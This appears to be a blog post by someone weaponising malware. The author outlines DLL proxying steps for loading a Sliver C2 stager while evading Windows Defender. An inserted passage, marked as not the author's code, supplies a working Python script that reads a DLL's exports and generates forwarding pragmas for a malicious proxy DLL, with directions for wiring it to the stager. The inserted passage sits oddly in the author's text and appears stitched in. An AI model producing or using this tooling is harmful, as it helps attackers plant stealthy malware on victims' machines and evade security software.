To further weaponize my malware, I decided to implement DLL proxying, since it is widely used by threat actors and leaves a lot of room for imagination and creativity. I am continuing from where I left off with my Sliver C2 stager, which I was injecting while bypassing Windows Defender with a combination of techniques (IAT hiding and obfuscation, NT API hashing), in the hope of making the attack a bit stealthier.
- Find a legitimate executable
- Find a dll used by a legitimate executable
- Identify exported functions
- Test it with a message box, while proxying
- Create your dll with your own implementation that will inject your stager
- Add the exported functions that will be redirected
- Test the functionality
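As an added example (not the author's code) covering the "identify exported functions" and "add the exported functions that will be redirected" steps above: a standard-library Python script that walks a DLL's export table and emits the MSVC linker pragmas that forward every named export to the renamed original. The PE it parses is a constructed, minimal fake (export table only) so the script runs offline; the original DLL is assumed to be renamed `legit_orig.dll` and placed beside the proxy, and only named exports are handled (ordinal-only exports would need an extra `,NONAME` entry that this script does not generate).

```python
import struct


def build_fake_dll(exports, base=1, magic=0x20B):
    """Constructed test input: a minimal PE whose only content is an export table.
    exports: list of "Name" or ("Name", "MODULE.Target") forwarder entries."""
    entries = [(e, None) if isinstance(e, str) else e for e in exports]
    n = len(entries)
    sec_rva, sec_raw = 0x1000, 0x400
    dll_name = b"legit.dll\0"
    off_funcs = 40                       # export directory header is 40 bytes
    off_names = off_funcs + 4 * n
    off_ords = off_names + 4 * n
    off_dllname = off_ords + 2 * n
    off_strings = off_dllname + len(dll_name)
    strings, name_rvas, func_rvas = b"", [], []
    for name, fwd in entries:
        name_rvas.append(sec_rva + off_strings + len(strings))
        strings += name.encode() + b"\0"
        if fwd:   # forwarder: function RVA points at a string inside the export table
            func_rvas.append(sec_rva + off_strings + len(strings))
            strings += fwd.encode() + b"\0"
        else:     # ordinary export: fake code RVA outside the export table
            func_rvas.append(0x2000 + 0x10 * len(func_rvas))
    size = off_strings + len(strings)
    edata = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, sec_rva + off_dllname, base, n, n,
                        sec_rva + off_funcs, sec_rva + off_names, sec_rva + off_ords)
    edata += b"".join(struct.pack("<I", r) for r in func_rvas)
    edata += b"".join(struct.pack("<I", r) for r in name_rvas)
    edata += b"".join(struct.pack("<H", i) for i in range(n))
    edata += dll_name + strings
    opt_size, dd_off, machine = (240, 112, 0x8664) if magic == 0x20B else (224, 96, 0x14C)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x2022)
    opt = struct.pack("<H", magic) + b"\0" * (dd_off - 2)
    opt += struct.pack("<II", sec_rva, size)                      # DataDirectory[0] = exports
    opt += b"\0" * (opt_size - dd_off - 8)
    sec = struct.pack("<8sIIIIIIHHI", b".edata", size, sec_rva, size, sec_raw, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + file_hdr + opt + sec
    return hdr.ljust(sec_raw, b"\0") + edata


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def _rva_to_off(sections, rva):
    for va, vsize, raw, rsize in sections:
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def parse_exports(data):
    """Return [(name, ordinal, forwarder_or_None)] for every named export of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = 112 if magic == 0x20B else 96        # DataDirectory start: PE32+ vs PE32
    exp_rva, exp_size = struct.unpack_from("<II", data, opt + dd_off)
    if exp_rva == 0:
        return []                                 # nothing exported, nothing to proxy
    sections = []
    for i in range(nsec):
        vsize, va, rsize, raw = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw, rsize))
    ed = _rva_to_off(sections, exp_rva)
    _, base, _, nnames, funcs, names, ords = struct.unpack_from("<IIIIIII", data, ed + 12)
    out = []
    for i in range(nnames):
        name_rva = struct.unpack_from("<I", data, _rva_to_off(sections, names + 4 * i))[0]
        idx = struct.unpack_from("<H", data, _rva_to_off(sections, ords + 2 * i))[0]
        frva = struct.unpack_from("<I", data, _rva_to_off(sections, funcs + 4 * idx))[0]
        # a function RVA that lands inside the export directory is a forwarder string
        fwd = _cstr(data, _rva_to_off(sections, frva)) if exp_rva <= frva < exp_rva + exp_size else None
        out.append((_cstr(data, _rva_to_off(sections, name_rva)), base + idx, fwd))
    return out


def forward_pragmas(exports, original="legit_orig"):
    """MSVC linker pragmas forwarding each export to the renamed original DLL
    (assumed to sit beside the proxy as legit_orig.dll; forwarders carry no .dll suffix).
    Exports the legitimate DLL itself forwards elsewhere are sent to that final target."""
    lines = []
    for name, ordinal, fwd in exports:
        target = fwd if fwd else "%s.%s" % (original, name)
        lines.append('#pragma comment(linker, "/export:%s=%s,@%d")' % (name, target, ordinal))
    return lines


if __name__ == "__main__":
    sample = build_fake_dll(["Foo", "Bar", ("Baz", "NTDLL.RtlZeroMemory")])
    print("\n".join(forward_pragmas(parse_exports(sample))))
```

Against a real target, feed `parse_exports(open(path, "rb").read())` the DLL found in step 2 and paste the emitted pragmas into the proxy DLL source next to the `DllMain` that starts the stager; the proxy must match the original's bitness, and the renamed original has to be shipped alongside it or every forwarded call fails with a module-not-found error.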
You can read my blog post about it.